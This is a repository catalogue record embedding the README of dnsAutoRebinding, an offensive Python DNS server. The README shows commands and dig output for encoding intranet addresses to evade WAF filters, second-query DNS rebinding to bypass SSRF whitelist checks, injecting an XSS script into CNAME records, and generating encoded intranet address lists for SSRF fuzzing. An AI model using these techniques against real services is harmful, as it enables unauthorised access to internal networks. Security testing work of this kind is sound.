{"id":13815339,"url":"https://github.com/Tr3jer/dnsAutoRebinding","last_synced_at":"2025-05-15T07:32:53.416Z","repository":{"id":65752248,"uuid":"95366928","full_name":"Tr3jer/dnsAutoRebinding","owner":"Tr3jer","description":"ssrf、ssrfIntranetFuzz、dnsRebinding、recordEncode、dnsPoisoning、Support ipv4/ipv6","archived":false,"fork":false,"pushed_at":"2017-08-17T05:16:03.000Z","size":943,"stargazers_count":217,"open_issues_count":0,"forks_count":48,"subscribers_count":6,"default_branch":"master","last_synced_at":"2024-08-04T04:07:25.573Z","etag":null,"topics":["dns","rebinding","ssrf"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Tr3jer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-06-25T15:04:20.000Z","updated_at":"2024-07-03T06:13:17.000Z","dependencies_parsed_at":"2023-02-08T04:25:11.660Z","dependency_job_id":null,"html_url":"https://github.com/Tr3jer/dnsAutoRebinding","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Tr3jer%2FdnsAutoRebinding","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Tr3jer%2FdnsAutoRebinding/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Tr3jer%2FdnsAutoRebinding/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Tr3jer%2FdnsAutoRebinding/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Tr3jer","download_url":"https://codeload.github.com/Tr3jer/dnsAutoRebinding/tar.gz/refs/heads/master",
"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225335316,"owners_count":17458257,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["dns","rebinding","ssrf"],"created_at":"2024-08-04T04:03:21.387Z","updated_at":"2024-11-19T10:31:46.806Z","avatar_url":"https://github.com/Tr3jer.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"# dnsAutoRebinding\n\n\u003e \u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;ssrf, ssrf intranet address fuzzing, second-query dns rebinding, ipv4/ipv6 support, ip address encoding support, dns record poisoning (a 0day at the end as an example). The mind map is in my head; too lazy to draw it.\n\nSupported record types and encodings:\n\n```\nMX = ipv4/ipv6/hex\nA = ipv4/en/int/hex\nAAAA = ipv6/int/hex\nCNAME = ipv4/ipv6/hex\n```\n\nConfigure the listening server example.com:\n\n| record type | record | record value |\n| --- | --- | --- |\n| A | ns | server ip |\n| NS | test | ns.example.com |\n\n\u003e sudo pip install ipaddr\n\nEdit lib/config.conf:\nmaindomain = test.example.com.\nNote that the trailing root dot must be included.\n\n```\nUsage: sudo python main.py {Options}\n\nOptions:\n  -h, --help            show this help message and exit\n  -t 300, --TTL=300     ttl value , 0 By Default\n  -y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX\n                        Record Type , A By Default\n  -e int/hex/en, --Encoding=int/hex/en\n                        Record Encoding , None By Default\n  -r, --Rebinding       The Second Time Query Return Target Ip\n  -p \"\u003cscript\u003ealert(/xss/)\u003c/script\u003e\", --payload=\"\u003cscript\u003ealert(/xss/)\u003c/script\u003e\"\n                        Specified Record , Support 
CNAME/MX\n\n```\n\nThe -y option specifies which record type to return:\n`-y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX Record Type , A By Default`\n\nThe -t option specifies the TTL value:\n`-t 300, --TTL=300     ttl value , 0 By Default`\n\nReturn an ipv4 address directly via an A record:\n`sudo ./main.py`\n\n```\n➜  ~ dig 192.168.1.1.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 192.168.1.1.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 50359\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;192.168.1.1.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n192.168.1.1.test.example.com. 0\tIN\tA\t192.168.1.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t227\tIN\tNS\tns.example.com.\n```\n\nserver:\n`[21:54:16] client ip:44486 =\u003e A =\u003e 192.168.1.1.test.example.com.`\n\nhex encoding:\n`sudo ./main.py -e hex`\n\n```\n➜  ~ dig 31302e302e302e31.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 31302e302e302e31.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 1585\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;31302e302e302e31.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n31302e302e302e31.test.example.com. 
0 IN\tA\t10.0.0.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t600\tIN\tNS\tns.example.com.\n```\n\nserver:\n`[22:00:42] client ip:30150 =\u003e A =\u003e 31302e302e302e31.test.example.com.`\n\nint encoding:\n`sudo ./main.py -e int`\n\n```\n➜  ~ dig 3232235777.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 3232235777.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 18066\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;3232235777.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n3232235777.test.example.com. 0\tIN\tA\t192.168.1.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t456\tIN\tNS\tns.example.com.\n```\n\nserver:\n`[22:03:00] client ip:5240 =\u003e A =\u003e 3232235777.test.example.com.`\n\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;This project is only needed because the waf recognises intranet addresses, and a waf can just as well recognise base conversions like these, so you should write your own address encoding:\n\nnum to en:\n\n```\n./lib/common.py 192.168.1.1\n\n1. Single IP Covert For En\n2. Build IP List\n[+] [1 By Default/2]\nbjckbgikbkb\n```\n\n`sudo ./main.py -e en`\n\n```\n➜  ~ dig bjckbgikbkb.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e bjckbgikbkb.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 5115\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;bjckbgikbkb.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\nbjckbgikbkb.test.example.com. 0\tIN\tA\t192.168.1.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t20\tIN\tNS\tns.example.com.\n```\n\nserver:\n`[22:10:22] client ip:8434 =\u003e A =\u003e bjckbgikbkb.test.example.com.`\n\n\nsecond-query dns rebinding:\n```\nsudo ./main.py -r\nInput Safe Ip? 
[Address/Req By Default]8.8.8.8\n```\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;Optionally enter an address the target trusts, for instance when a firewall checks during ssrf whether the dns answer is on a whitelist. Defaults to the address of the requesting client. (Remember that special cases require specifying the record type.)\n\n\nFirst query:\n\n```\n➜  ~ dig 192.168.1.1.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 192.168.1.1.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 59544\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;192.168.1.1.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n192.168.1.1.test.example.com. 0\tIN\tA\t8.8.8.8\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t461\tIN\tNS\tns.example.com.\n```\n\nSecond query:\n\n```\n➜  ~ dig 192.168.1.1.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 192.168.1.1.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 45312\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;192.168.1.1.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n192.168.1.1.test.example.com. 
0\tIN\tA\t192.168.1.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t501\tIN\tNS\tns.example.com.\n```\n\ndns record poisoning:\n`sudo ./main.py -p \"\u003cscript\u003ealert(/xss/)\u003c/script\u003e\" -y CNAME`\n\n```\n➜  ~ dig test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 5073\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;test.example.com.\t\t\tIN\tA\n\n;; ANSWER SECTION:\ntest.example.com.\t\t0\tIN\tCNAME\t\u003cscript\u003ealert\\(/xss/\\)\u003c/script\u003etest.example.com.\n```\n\n![0day](0day.png)\n\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;How you play with this depends on how your little brain is wired. If the firewall also checks for a trusted address, edit lib/common.py:\n\n```\nelif payload != 'None' and payload.find(mainDomain) == -1:\n    record = payload + \"信任地址.\"\n```\n\nipListBuild:\nGenerates addresses for a whole network segment in bulk, optionally encoded; suited to ssrf intranet address fuzzing.\n\n```\npython lib/common.py 192.168.1.1\n\n1. Single IP Covert For En\n2. Build IP List\n[+] [1 By Default/2]2\n[+] Please Input Segment Length [24 By Default]\n[+] Please Input Encoding ['ipv4' By Default]hex\n[+] Please Input Server Root Address [test.example.com By Default]\n[+] Stored in the 20170625223912_test_example_com_hex.txt\n[root@VM_34_252_centos dnsAutoRebinding]# head -n 5 20170625223912_test_example_com_hex.txt\n3139322e3136382e312e31.test.example.com\n3139322e3136382e312e32.test.example.com\n3139322e3136382e312e33.test.example.com\n3139322e3136382e312e34.test.example.com\n3139322e3136382e312e35.test.example.com\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTr3jer%2FdnsAutoRebinding","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FTr3jer%2FdnsAutoRebinding","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTr3jer%2FdnsAutoRebinding/lists"}